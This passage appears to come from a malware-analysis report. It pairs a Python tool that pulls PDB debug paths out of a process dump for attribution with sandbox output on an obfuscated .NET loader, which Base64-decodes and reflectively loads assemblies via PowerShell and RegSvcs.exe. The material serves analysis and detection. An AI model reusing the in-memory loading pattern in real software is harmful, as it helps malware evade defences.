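SAMPLE_DUMP = (
    b"\x00" * 8
    + b"RSDS" + b"A" * 20 + b"not a pdb path\x00"   # decoy at offset 8
    + b"\xcc" * 4
    + build_rsds(SAMPLE_GUID, 1, PDB_PATH)          # real record at offset 51
    + b"\xff" * 9
)


def parse_rsds(blob, offset):
    """Decode the RSDS record at offset; raise ValueError if it is malformed."""
    if blob[offset:offset + 4] != b"RSDS":
        raise ValueError("no RSDS signature")
    if len(blob) < offset + 24:
        raise ValueError("truncated header")
    guid = uuid.UUID(bytes_le=bytes(blob[offset + 4:offset + 20]))
    age = struct.unpack_from("<I", blob, offset + 20)[0]
    end = blob.find(b"\x00", offset + 24)
    if end == -1:
        raise ValueError("unterminated path")
    # UnicodeDecodeError is a ValueError, so a random "RSDS" hit in binary data is skipped.
    path = blob[offset + 24:end].decode("utf-8", errors="strict")
    return {"offset": offset, "guid": guid, "age": age, "path": path}


def looks_like_pdb_path(path):
    """Cheap plausibility filter: printable ASCII, sane length, .pdb extension."""
    return (
        0 < len(path) < 260
        and path.lower().endswith(".pdb")
        and all(32 <= ord(c) < 127 for c in path)
    )


def find_pdb_paths(blob):
    """Return every plausible RSDS record in the blob, in offset order."""
    found = []
    pos = blob.find(b"RSDS")
    while pos != -1:
        try:
            rec = parse_rsds(blob, pos)
            if looks_like_pdb_path(rec["path"]):
                found.append(rec)
        except ValueError:
            pass  # signature bytes that are not a real record
        pos = blob.find(b"RSDS", pos + 1)
    return found


def symbol_server_key(rec):
    """GUID (upper-case hex, no dashes) + age, the key a symbol server indexes the PDB by."""
    return f"{rec['guid'].hex.upper()}{rec['age']:X}"


def pivots(rec):
    """Pieces of the path worth pivoting on: account name, folder under Desktop
    (here the builder kit's project directory), and the PDB file name."""
    parts = rec["path"].split("\\")
    low = [p.lower() for p in parts]
    user = parts[low.index("users") + 1] if "users" in low and low.index("users") + 1 < len(parts) else None
    project = parts[low.index("desktop") + 1] if "desktop" in low and low.index("desktop") + 1 < len(parts) else None
    return {"user": user, "project": project, "filename": parts[-1]}


if __name__ == "__main__":
    for rec in find_pdb_paths(SAMPLE_DUMP):
        print(f"offset {rec['offset']}: {rec['path']}")
        print("  symsrv key:", symbol_server_key(rec))
        print("  pivots:", pivots(rec))
```

Run it against a process dump (read the file as bytes and pass it to find_pdb_paths) rather than the on-disk script: the .ps1 carries the DLL only in encoded form, so the path is visible only after the assembly has been decoded into RegSvcs.exe memory.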

Data Obfuscation

barindex
Source: 0.2.powershell.exe.1ee5f4509a0.2.raw.unpack, gildzzqZDUhVh9QqVcNCwIQO9VGswVHvAI48i1FwSTQKMhjwHZjIW9mdwJ3y.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{yjkGtRHmIr9nPMZAlUbnH0cde9vCK7hK4CidYwTMrnIK9GNfl4tjltK4xQpIIbioCitLSAUMywv.GkEAxd3nJ5T2No6D7GAPyTu9H2RCHhovmhce8vUtvQRZwS3Llj8PT6QyxoB8ejmDziCHqIJETc8,yjkGtRHmIr9nPMZAlUbnH0cde9vCK7hK4CidYwTMrnIK9GNfl4tjltK4xQpIIbioCitLSAUMywv._0DtSY0DAdvftfFE2pUuSLnTfHqIJzYq6DkKj7o2H1UhyfuKOT9OoONpBct4AEPnNiLvJwXthHl1,yjkGtRHmIr9nPMZAlUbnH0cde9vCK7hK4CidYwTMrnIK9GNfl4tjltK4xQpIIbioCitLSAUMywv._6rmQnBxYz9wFjXeTkpWUZeLOu39HgSUqZd71j1za1gv5xaKy4Tw5vv0iULTi38ZgN6lxg4rgfwl,yjkGtRHmIr9nPMZAlUbnH0cde9vCK7hK4CidYwTMrnIK9GNfl4tjltK4xQpIIbioCitLSAUMywv.hQAzsDTmejtRzFTAGYZ9JLeR7bLH9yKFQ8A2gM6qfonXx3k8I99ygySzYyrHqAscPInDM6HYvbS,UIneUVhjAAAdxHEMUaYKIpeixQFl5WWU6DMPriQ9sgkz8S0bo2RqomhpTnonfiuVKA3hhRipwbqS80QfgRd5Z4E450tI.xRBnfzrwWduwbc5XTg9GoORqm0jrxu8hsNXppUjoIbTyMyOoWfQiJYASUrhx9r5waTu9nCfcEhqJO()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.powershell.exe.1ee5f4509a0.2.raw.unpack, gildzzqZDUhVh9QqVcNCwIQO9VGswVHvAI48i1FwSTQKMhjwHZjIW9mdwJ3y.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{WZwBd3zn7jOgzxsKXNaDlesEnLuPYUA1uQqFNhzgkdmNERsGyqQhPXrsafxny5m0W7nuPXGTdQtmfsddE4HLKdFEYHN2[2],UIneUVhjAAAdxHEMUaYKIpeixQFl5WWU6DMPriQ9sgkz8S0bo2RqomhpTnonfiuVKA3hhRipwbqS80QfgRd5Z4E450tI.JF9XD3PKLzllq7mNRKeF2ZEh4ezaBNAJbPZaWmOdDth4i0epPbsZqo1dmRi2God1jSSCOTuXb9M1p(Convert.FromBase64String(WZwBd3zn7jOgzxsKXNaDlesEnLuPYUA1uQqFNhzgkdmNERsGyqQhPXrsafxny5m0W7nuPXGTdQtmfsddE4HLKdFEYHN2[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.powershell.exe.1ee60275c50.0.raw.unpack, gildzzqZDUhVh9QqVcNCwIQO9VGswVHvAI48i1FwSTQKMhjwHZjIW9mdwJ3y.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{yjkGtRHmIr9nPMZAlUbnH0cde9vCK7hK4CidYwTMrnIK9GNfl4tjltK4xQpIIbioCitLSAUMywv.GkEAxd3nJ5T2No6D7GAPyTu9H2RCHhovmhce8vUtvQRZwS3Llj8PT6QyxoB8ejmDziCHqIJETc8,yjkGtRHmIr9nPMZAlUbnH0cde9vCK7hK4CidYwTMrnIK9GNfl4tjltK4xQpIIbioCitLSAUMywv._0DtSY0DAdvftfFE2pUuSLnTfHqIJzYq6DkKj7o2H1UhyfuKOT9OoONpBct4AEPnNiLvJwXthHl1,yjkGtRHmIr9nPMZAlUbnH0cde9vCK7hK4CidYwTMrnIK9GNfl4tjltK4xQpIIbioCitLSAUMywv._6rmQnBxYz9wFjXeTkpWUZeLOu39HgSUqZd71j1za1gv5xaKy4Tw5vv0iULTi38ZgN6lxg4rgfwl,yjkGtRHmIr9nPMZAlUbnH0cde9vCK7hK4CidYwTMrnIK9GNfl4tjltK4xQpIIbioCitLSAUMywv.hQAzsDTmejtRzFTAGYZ9JLeR7bLH9yKFQ8A2gM6qfonXx3k8I99ygySzYyrHqAscPInDM6HYvbS,UIneUVhjAAAdxHEMUaYKIpeixQFl5WWU6DMPriQ9sgkz8S0bo2RqomhpTnonfiuVKA3hhRipwbqS80QfgRd5Z4E450tI.xRBnfzrwWduwbc5XTg9GoORqm0jrxu8hsNXppUjoIbTyMyOoWfQiJYASUrhx9r5waTu9nCfcEhqJO()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.powershell.exe.1ee60275c50.0.raw.unpack, gildzzqZDUhVh9QqVcNCwIQO9VGswVHvAI48i1FwSTQKMhjwHZjIW9mdwJ3y.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{WZwBd3zn7jOgzxsKXNaDlesEnLuPYUA1uQqFNhzgkdmNERsGyqQhPXrsafxny5m0W7nuPXGTdQtmfsddE4HLKdFEYHN2[2],UIneUVhjAAAdxHEMUaYKIpeixQFl5WWU6DMPriQ9sgkz8S0bo2RqomhpTnonfiuVKA3hhRipwbqS80QfgRd5Z4E450tI.JF9XD3PKLzllq7mNRKeF2ZEh4ezaBNAJbPZaWmOdDth4i0epPbsZqo1dmRi2God1jSSCOTuXb9M1p(Convert.FromBase64String(WZwBd3zn7jOgzxsKXNaDlesEnLuPYUA1uQqFNhzgkdmNERsGyqQhPXrsafxny5m0W7nuPXGTdQtmfsddE4HLKdFEYHN2[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.powershell.exe.1ee5f4509a0.2.raw.unpack, gildzzqZDUhVh9QqVcNCwIQO9VGswVHvAI48i1FwSTQKMhjwHZjIW9mdwJ3y.cs .Net Code: N4FYw4dMKIlrkiRxPMqNSNPXd3XzaB2on7k6EPgYotmrpL1DJJT6s4bQ0Jpi System.AppDomain.Load(byte[])
Source: 0.2.powershell.exe.1ee5f4509a0.2.raw.unpack, gildzzqZDUhVh9QqVcNCwIQO9VGswVHvAI48i1FwSTQKMhjwHZjIW9mdwJ3y.cs .Net Code: e3ycssMggM4Z0yhJrvZIintLtrlI020oigf6aNHIG4CIeWFdy8mI6Bs5fAJKAMhkol3VWhdpz8k61jdKu3tvj6QoAOmA System.AppDomain.Load(byte[])
Source: 0.2.powershell.exe.1ee5f4509a0.2.raw.unpack, gildzzqZDUhVh9QqVcNCwIQO9VGswVHvAI48i1FwSTQKMhjwHZjIW9mdwJ3y.cs .Net Code: e3ycssMggM4Z0yhJrvZIintLtrlI020oigf6aNHIG4CIeWFdy8mI6Bs5fAJKAMhkol3VWhdpz8k61jdKu3tvj6QoAOmA
Source: 0.2.powershell.exe.1ee60275c50.0.raw.unpack, gildzzqZDUhVh9QqVcNCwIQO9VGswVHvAI48i1FwSTQKMhjwHZjIW9mdwJ3y.cs .Net Code: N4FYw4dMKIlrkiRxPMqNSNPXd3XzaB2on7k6EPgYotmrpL1DJJT6s4bQ0Jpi System.AppDomain.Load(byte[])
Source: 0.2.powershell.exe.1ee60275c50.0.raw.unpack, gildzzqZDUhVh9QqVcNCwIQO9VGswVHvAI48i1FwSTQKMhjwHZjIW9mdwJ3y.cs .Net Code: e3ycssMggM4Z0yhJrvZIintLtrlI020oigf6aNHIG4CIeWFdy8mI6Bs5fAJKAMhkol3VWhdpz8k61jdKu3tvj6QoAOmA System.AppDomain.Load(byte[])
Source: 0.2.powershell.exe.1ee60275c50.0.raw.unpack, gildzzqZDUhVh9QqVcNCwIQO9VGswVHvAI48i1FwSTQKMhjwHZjIW9mdwJ3y.cs .Net Code: e3ycssMggM4Z0yhJrvZIintLtrlI020oigf6aNHIG4CIeWFdy8mI6Bs5fAJKAMhkol3VWhdpz8k61jdKu3tvj6QoAOmA
Source: 2.2.RegSvcs.exe.68d0000.3.raw.unpack, -Module-.cs .Net Code: _200E_202A_200E_206A_200B_202D_200E_202E_206C_206E_202A_200C_202E_206A_206A_202A_206A_206E_202C_200C_200E_202E_206A_200D_206E_200F_200E_206A_200D_206A_206B_202A_200E_202C_206F_202A_200C_202E_206E_202E System.Reflection.Assembly.Load(byte[])
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFD9B895B71 push ebp; retf 0_2_00007FFD9B895B72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_00F68080 push eax; iretd 2_2_00F68081
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_00F64CC8 pushad ; retf 2_2_00F64CD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_063857D1 push es; ret 2_2_0638581C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_063857D1 push es; ret 2_2_0638585C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_063857C5 push es; ret 2_2_063857D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_06385ABD push es; ret 2_2_06385AC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0638581D push es; ret 2_2_0638585C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_06385869 push es; ret 2_2_063858B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0638585D push es; ret 2_2_06385868
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_063858B5 push es; ret 2_2_063858F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_063858F5 push es; ret 2_2_06385900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_06385901 push es; ret 2_2_0638594C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_06385969 push es; ret 2_2_0638598C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_0638598D push es; ret 2_2_06385998
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_063859D5 push es; ret 2_2_063859E4
Source: 0.2.powershell.exe.1ee5f4509a0.2.raw.unpack, jlP9ZmdwEcSal0DicgRXsFBAsRfalWtK8ACjZN20FmtLoweURb4IYXHMKD2jaT0u384K7iAfr5Cnm.cs High entropy of concatenated method names: '_3TNqZ5hEQVdooCaFVGMhOACTkYaCnTtbNyPGedVllTTfJY1ngUvGia8lhIVPmVUfboypRhwske82g', '_9hHmMsNWAQ6pax4hFZSp7KQG0rewoH7osRvhlI61xGEa9wmvjJneedEBnJlIm8ZEnxTWhRNJPkX6Y', '_49h5GNrcmqMaLuCg35WCTCs0h7BKuHAJaBowmRkClgoGOAsQ5inXYS1I0M7Z4aMeT3m9F31FvkW4S', 'PaOgG4FwzNenoLAMiHTHwPqA01MCJnbz4LPDBsbvSv1JUtf62uk5cC2FEJF1ahKJztdhgk', 'eyvfhsKHdxCVDDLO16w9bGJuDfMJixaw3yryvgfDvZpwSeF25JUC5FWDVzeVdYdoClck1f', 'J8aYoV2Df2dibOrCy3jWkKuxTQGwmadjsTkX0of9qc6qZW1dbylXmhbywydmt9LWAvlhFE', 'RQjJNYKDaRYNkmSSONuq1KvQn8xVeEqpZ43P9vqgNRXMzA99C74pQ7u867FKwVkSrz512z', 'Kr3d4jpdx7Aj5Es33qJdyZ5zLAZ6Oqexmh8VHGcQerW9335ONRoGZWlPv97IHMf5QLBSso', 'NHGZCbXPEwk9PdNJ2mCxrW7xUVF0RMDcuQdhPHTWzD89zg7tMv21UaWUF3nSJoDCbShLB8', 'URJnOTwGHUXQHGoqlnefuWqngz1MSskFe5rCHVNBGx1XVNP7QkTB4aFbYXZsWy4Hcgtyg7'
Source: 0.2.powershell.exe.1ee5f4509a0.2.raw.unpack, yjkGtRHmIr9nPMZAlUbnH0cde9vCK7hK4CidYwTMrnIK9GNfl4tjltK4xQpIIbioCitLSAUMywv.cs High entropy of concatenated method names: 'GzuVwKUZhkX5MaCXS8tELiub2rzA1ABgbXvI4', 'oXpRvTFzCDMB9YdUHEyjFlV0N0YfeW9OJukeK', 'sh0DBD1NjSGAqZVBWAtzcy7TbplyMhoGUfRdG', 'MPt9bvo6JSjfeajadh10xlBrVCyhXGmiVK0rc'
Source: 0.2.powershell.exe.1ee5f4509a0.2.raw.unpack, 0mxMqJmDRkOT353B3lVUMBD9Gejx6UE7bcw8cMUdm3.cs High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'vBcnqg8Bxc612p2B1u3aTcQIPqiV5yrAPbgFT', 'kTfYaHyir2gb88jHa1xDDJOquMyuUmtAsRHRV', 'XxvYgezFFU8AxmQlcN8rTw2L9iLIPa6bPfCOZ', 'MvQTtw3McXFYFf0jea0HcJrIp99lPddWKFt98'
Source: 0.2.powershell.exe.1ee5f4509a0.2.raw.unpack, UIneUVhjAAAdxHEMUaYKIpeixQFl5WWU6DMPriQ9sgkz8S0bo2RqomhpTnonfiuVKA3hhRipwbqS80QfgRd5Z4E450tI.cs High entropy of concatenated method names: 'uLcpjPuRlAYcVXjFYFmtEmE6IG3WW1Mtzr0RIFk9A9EyQrTvzKXXIVg2Kl9aPa4ZUwxDazhSAPcV9OBgEpQgQkmuIDh4', 'YKbSLHwMqgcS2pKolhOEHj3xgyFveKjEKCcidxigp4U5yTh4YfVyGzBJwlJcnpP19L9VroiHmlyJuG3idLBl3mCSn6Mm', 'zp4H0yQ0UehqO8XjWJBobcRnUXHtBNNdOJraqUqF18ZXk1TLUu8ITK9oxZPMDksn0W1Pa1Zafu97BPz21DtkMiy8OqlZ', 'acNGsDNjWVethdtOAHfS5bGCQjlG6rRtvqD0T5njuLJ25Dych7HkSrtJugHPYU1sEidvPQu9DNCndDlA1BwGcgqQOkza', 'EYijaGNCTZA5ssmfCphcWBaQGPjJhnvrfOYStXrbSHqI8vBOIvDeyI1zMKU0GLeIXfA35yHnFGzkvaEC5O96miFuyOQc', 'U97RvjaNCYtJiiNUnqYFKh9zn8xByBKWBrFUlgNNn3Y9kt6515ldQ6O97fXLCplKOYUDnKrYZHyKp20hGPYqLPGP43to', 'R5jVmcwmbdTygVF5mseYL7gR5WlhWpIX0SdRUW8f8j2wtWOjloLyaqtkDxKHgIKQPDNnccnKif6EDZ9Yo6kg1mpXNGdk', 'Qg4y4yWaLZe8ShxzIYTJF2jveZABfiLw14cUW2R4nubmT4B60JE6aFHCnRFHd6P1uknuuQS91W4dkE081WxvGjwhal6H', '_5Dw5lOtBWWVVZmthJsMhPC9cUzM5iN8pVJpzSBUee0S2ugQkSBULaRMjDDzaJSKNWwNUaDj8vvXM5hobP13i5jQnjnBo', 'C6Cvo3FCCkFc54Z203lOyD77mYeTf2u9XT2Fg9R2Ovlu8bqQgixOWFkdCS1Rv8ce5gNSQhYPH0Rte8KRxk0sprhtBDOD'
Source: 0.2.powershell.exe.1ee5f4509a0.2.raw.unpack, KqM7OHZ0szpXMKUjIeoOth6ym1BTJiUrVDaPclVtZntCve6UTLSqTCZXaNVMStUq6wiimQow3L7sbJOInc0XhfKzEm5y.cs High entropy of concatenated method names: 'vlT8dwXrYPa88X2PCSTl1MzL1hOXuK3SZzQ1IazokTftenOcdNLZ16Tqdw7yu5ANElYZlWxgwhbSblLDgcDV4JQrQgpG', 'Yri9DO8KJSBPdGKWv6rruFnfPHpprBjidMFUJ', 'ihN7Vn5g9RpbzGgZUePo8B2niWfMdhDAfds47', 'dvL73CjsvtRpTg2h7knB3tzBhCT55MED4VzHf', 'wdniSU5EpAhXrItpr3nizrrDSwO3uC8vl3Kj9'
Source: 0.2.powershell.exe.1ee5f4509a0.2.raw.unpack, HSVnbciCbEspA5qeJHR9bJSsZnPWuo0GrZXu7MR1gBQLksXwzFXzWWgcApgGUgNKiWg0pwlEuNF.cs High entropy of concatenated method names: '_2q4wpPRfaVhr0exnXH7y891APAO7HbKET96GKYxGsofSr6nSYQvElSnVQzd4FzDKrH30YbalY8L', 'aWKN8JgTw7OsnLqijS1G2FSf5lKyN1BzTceUS7AusrlZE4LOpgaXcu1Wuwzk1u0fNisdvfs1qDN', 'FJHVAMux3eOse32NPNrYghB0J9OilS0b1VXxCJDJh6FXmI8aBAEjaNpxaC2kopUIxwHOIGv955L', 'jGfRxrKXNpeTM8YO7QPoRJmjQ2fPzxvsBjNLD', 'kZ9PmGZma9rdlqmPKpJGfpPr2H3r8JkUX7S1I', 'AQhlQ1kzIc9Ef2keyCUXapmb3OGi6FTBB2Kva', 'bwp4xqBSAhOIzAidlh3oJJvRivoyrO2AeizFi', 't4NvZMrcVrH5QwGjkdYgS8T6KKd876mvUUikN', 'THXyLh0AdRiaDLkYYQVt4gIf6aGSl2TGIZ0Hv', 'AT1vYmitOvIzOWbQZzZiuTU12J3PiZKXYnxiA'
Source: 0.2.powershell.exe.1ee5f4509a0.2.raw.unpack, gildzzqZDUhVh9QqVcNCwIQO9VGswVHvAI48i1FwSTQKMhjwHZjIW9mdwJ3y.cs High entropy of concatenated method names: 'QVEVDhViI9Msxtf3rvGnQiMgFCItcS0p5D6Z1BTCpo5f6Fde2LisyMtpWmRG', 'N4FYw4dMKIlrkiRxPMqNSNPXd3XzaB2on7k6EPgYotmrpL1DJJT6s4bQ0Jpi', '_1lKSstulGZhXYINkaQd9Asdnrsvcni39pRvUFDpwycuW4xpMqX4hS77iXc6K', 'PNFvO7d1Mi2IWzxMtx1zqm34FyxGrUWwyLxwiGmyaWGVEehy9D6hxvHM1wdE', 'NzfmYhAUGceMKW0mjLzHPddnDgqRRmTH0j9pDfOYWD2DRetXvurMj6Mnbf7d', 'xt4khGVNTHDEWpsI1gYgYvoJk7rms4Vqp4A1OuJJVHK8d5oZr1gtEs3Mjthp', 'zmLy2I6ntM2aqhLCLWxvECHOzvQIBQMbMZRkop6htT9CZiCpf1AwaOdoxGnL', 'lGU48PAY736gsQX2viMog6499aYSQjosLWQRnL6JHFF67P95LEO7pVqTOpjP', 'tWcbDFC14xGh0OYdfNzCiUkAdgC4GkZEk3fcvvyC27fsgUEboKucKM0JQCNsUm0dx4Ht2O9GEH5iHMX42Oi6Tya6c44Z', '_74dfJY6UAxv3WrBFrcQeFUKJoMxCX21o0QCYxD66ZQnhM3Ecq9rhBxcB8PaVyrqjY8AQ0yV0nFGhMbW1o118n5tdEMW0'
Source: 0.2.powershell.exe.1ee5f4509a0.2.raw.unpack, eTjxx5sBsv0TQY2QsBukke7xGuRK5Vrnm4Vc7A6o9H3gWnlfVttPzqM2XIgnZsx9KoT8nFv5wwqNH0KJaX9HbOIURT9H.cs High entropy of concatenated method names: 'MqoWDQphzr8fvnkIH9zEEDcDy7t0zalckB2FahnIxepzgPAMJUZvXj5AyxTxgsTptxlaeKuQhZNQ652tx2KfrWb4jegt', '_39p79IiNTKU0DvuMDijBA51wmgQCy8uNaqsmM', 'VTi9WoIpssJGUPzXMbuMCGF0hZYIeuMphrb9F', 'iVslLiCsMBZl1LzuhzFMYBpuQXVYU9MiwNoac', 'Tmceex3fvKsJkAkUdbAOatlNKDEvt7aWE2OZV'
Source: 0.2.powershell.exe.1ee5f4509a0.2.raw.unpack, LG1L2T5n8vBSO4Dc4B2U6DqXmFQQMeofgjzcWBgDvgLe6zjhcZQuAlRgzGt1yUyiDgQ1zAPZRXE.cs High entropy of concatenated method names: 'czdLIkkJGHePbv60eOuYeyQebTWkxLQxtIBDozzTkzeHjwvF0iZ9WLXSXldzQJva2vLFfWmskZn', 'j4gQD94PHOIvfqwgF8eMCnFm32o0IB5Ap5qxVVZaFRLKmaLwc0kz81j2suIyuSG55aCfkON107y', 'K6lV2zL7a7baiNZWYLV0Pa7uhSeNElH68zllWH3k55hqCfKpRoNiazcpVFJa', '_3pqyNrhtv7CmhWTfIKaVxCTfMxlC4kt3daOpdYBPiciiKcXwK1tRoUER3QN3', 'jxIHzBWZPIwWF5Me16RXKy5D4q8hbHjIdITEMMSQOScHVlETgFjWzxFrMe5o', 'rgHuZwYDAVkDNu5fiQGgpbr60XJ1IwMKjiCWFJ4F1RAlRxZyaVrVBTTv5GYA', 'zv9n71pQ0f50PGPzTuOQ3EzQE9qjMl5Z2yV4UK950JFaZNBxHTG4HgTd1jZ6', '_5jeSQ3EJhe2fy9ifCjr5hanazmLriQS1eJsXevXq9vWo9BtzOTy0qlNTrwXI', 'yDpWKuZ7sOl8dZSwzdYBzBedzlS61vlzsjKG7qtZRtuBOZBV1zTFKonJ80td', '_4QkPUIxQHkmMssVmBG2fIN5OOjEuP5kl4bcy3jjLl4JdQehPZIYuCigGsUp8'
Source: 0.2.powershell.exe.1ee60275c50.0.raw.unpack, jlP9ZmdwEcSal0DicgRXsFBAsRfalWtK8ACjZN20FmtLoweURb4IYXHMKD2jaT0u384K7iAfr5Cnm.cs High entropy of concatenated method names: '_3TNqZ5hEQVdooCaFVGMhOACTkYaCnTtbNyPGedVllTTfJY1ngUvGia8lhIVPmVUfboypRhwske82g', '_9hHmMsNWAQ6pax4hFZSp7KQG0rewoH7osRvhlI61xGEa9wmvjJneedEBnJlIm8ZEnxTWhRNJPkX6Y', '_49h5GNrcmqMaLuCg35WCTCs0h7BKuHAJaBowmRkClgoGOAsQ5inXYS1I0M7Z4aMeT3m9F31FvkW4S', 'PaOgG4FwzNenoLAMiHTHwPqA01MCJnbz4LPDBsbvSv1JUtf62uk5cC2FEJF1ahKJztdhgk', 'eyvfhsKHdxCVDDLO16w9bGJuDfMJixaw3yryvgfDvZpwSeF25JUC5FWDVzeVdYdoClck1f', 'J8aYoV2Df2dibOrCy3jWkKuxTQGwmadjsTkX0of9qc6qZW1dbylXmhbywydmt9LWAvlhFE', 'RQjJNYKDaRYNkmSSONuq1KvQn8xVeEqpZ43P9vqgNRXMzA99C74pQ7u867FKwVkSrz512z', 'Kr3d4jpdx7Aj5Es33qJdyZ5zLAZ6Oqexmh8VHGcQerW9335ONRoGZWlPv97IHMf5QLBSso', 'NHGZCbXPEwk9PdNJ2mCxrW7xUVF0RMDcuQdhPHTWzD89zg7tMv21UaWUF3nSJoDCbShLB8', 'URJnOTwGHUXQHGoqlnefuWqngz1MSskFe5rCHVNBGx1XVNP7QkTB4aFbYXZsWy4Hcgtyg7'
Source: 0.2.powershell.exe.1ee60275c50.0.raw.unpack, yjkGtRHmIr9nPMZAlUbnH0cde9vCK7hK4CidYwTMrnIK9GNfl4tjltK4xQpIIbioCitLSAUMywv.cs High entropy of concatenated method names: 'GzuVwKUZhkX5MaCXS8tELiub2rzA1ABgbXvI4', 'oXpRvTFzCDMB9YdUHEyjFlV0N0YfeW9OJukeK', 'sh0DBD1NjSGAqZVBWAtzcy7TbplyMhoGUfRdG', 'MPt9bvo6JSjfeajadh10xlBrVCyhXGmiVK0rc'
Source: 0.2.powershell.exe.1ee60275c50.0.raw.unpack, 0mxMqJmDRkOT353B3lVUMBD9Gejx6UE7bcw8cMUdm3.cs High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'vBcnqg8Bxc612p2B1u3aTcQIPqiV5yrAPbgFT', 'kTfYaHyir2gb88jHa1xDDJOquMyuUmtAsRHRV', 'XxvYgezFFU8AxmQlcN8rTw2L9iLIPa6bPfCOZ', 'MvQTtw3McXFYFf0jea0HcJrIp99lPddWKFt98'
Source: 0.2.powershell.exe.1ee60275c50.0.raw.unpack, UIneUVhjAAAdxHEMUaYKIpeixQFl5WWU6DMPriQ9sgkz8S0bo2RqomhpTnonfiuVKA3hhRipwbqS80QfgRd5Z4E450tI.cs High entropy of concatenated method names: 'uLcpjPuRlAYcVXjFYFmtEmE6IG3WW1Mtzr0RIFk9A9EyQrTvzKXXIVg2Kl9aPa4ZUwxDazhSAPcV9OBgEpQgQkmuIDh4', 'YKbSLHwMqgcS2pKolhOEHj3xgyFveKjEKCcidxigp4U5yTh4YfVyGzBJwlJcnpP19L9VroiHmlyJuG3idLBl3mCSn6Mm', 'zp4H0yQ0UehqO8XjWJBobcRnUXHtBNNdOJraqUqF18ZXk1TLUu8ITK9oxZPMDksn0W1Pa1Zafu97BPz21DtkMiy8OqlZ', 'acNGsDNjWVethdtOAHfS5bGCQjlG6rRtvqD0T5njuLJ25Dych7HkSrtJugHPYU1sEidvPQu9DNCndDlA1BwGcgqQOkza', 'EYijaGNCTZA5ssmfCphcWBaQGPjJhnvrfOYStXrbSHqI8vBOIvDeyI1zMKU0GLeIXfA35yHnFGzkvaEC5O96miFuyOQc', 'U97RvjaNCYtJiiNUnqYFKh9zn8xByBKWBrFUlgNNn3Y9kt6515ldQ6O97fXLCplKOYUDnKrYZHyKp20hGPYqLPGP43to', 'R5jVmcwmbdTygVF5mseYL7gR5WlhWpIX0SdRUW8f8j2wtWOjloLyaqtkDxKHgIKQPDNnccnKif6EDZ9Yo6kg1mpXNGdk', 'Qg4y4yWaLZe8ShxzIYTJF2jveZABfiLw14cUW2R4nubmT4B60JE6aFHCnRFHd6P1uknuuQS91W4dkE081WxvGjwhal6H', '_5Dw5lOtBWWVVZmthJsMhPC9cUzM5iN8pVJpzSBUee0S2ugQkSBULaRMjDDzaJSKNWwNUaDj8vvXM5hobP13i5jQnjnBo', 'C6Cvo3FCCkFc54Z203lOyD77mYeTf2u9XT2Fg9R2Ovlu8bqQgixOWFkdCS1Rv8ce5gNSQhYPH0Rte8KRxk0sprhtBDOD'
Source: 0.2.powershell.exe.1ee60275c50.0.raw.unpack, KqM7OHZ0szpXMKUjIeoOth6ym1BTJiUrVDaPclVtZntCve6UTLSqTCZXaNVMStUq6wiimQow3L7sbJOInc0XhfKzEm5y.cs High entropy of concatenated method names: 'vlT8dwXrYPa88X2PCSTl1MzL1hOXuK3SZzQ1IazokTftenOcdNLZ16Tqdw7yu5ANElYZlWxgwhbSblLDgcDV4JQrQgpG', 'Yri9DO8KJSBPdGKWv6rruFnfPHpprBjidMFUJ', 'ihN7Vn5g9RpbzGgZUePo8B2niWfMdhDAfds47', 'dvL73CjsvtRpTg2h7knB3tzBhCT55MED4VzHf', 'wdniSU5EpAhXrItpr3nizrrDSwO3uC8vl3Kj9'
